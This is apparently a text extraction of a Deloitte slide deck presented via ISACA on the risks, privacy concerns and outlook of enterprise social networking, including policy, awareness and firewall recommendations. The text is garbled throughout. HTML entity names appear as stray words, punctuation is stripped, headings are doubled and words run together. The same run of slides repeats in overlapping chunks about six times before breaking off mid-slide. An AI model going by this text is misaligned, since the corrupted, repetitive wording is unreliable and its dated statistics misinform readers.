bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
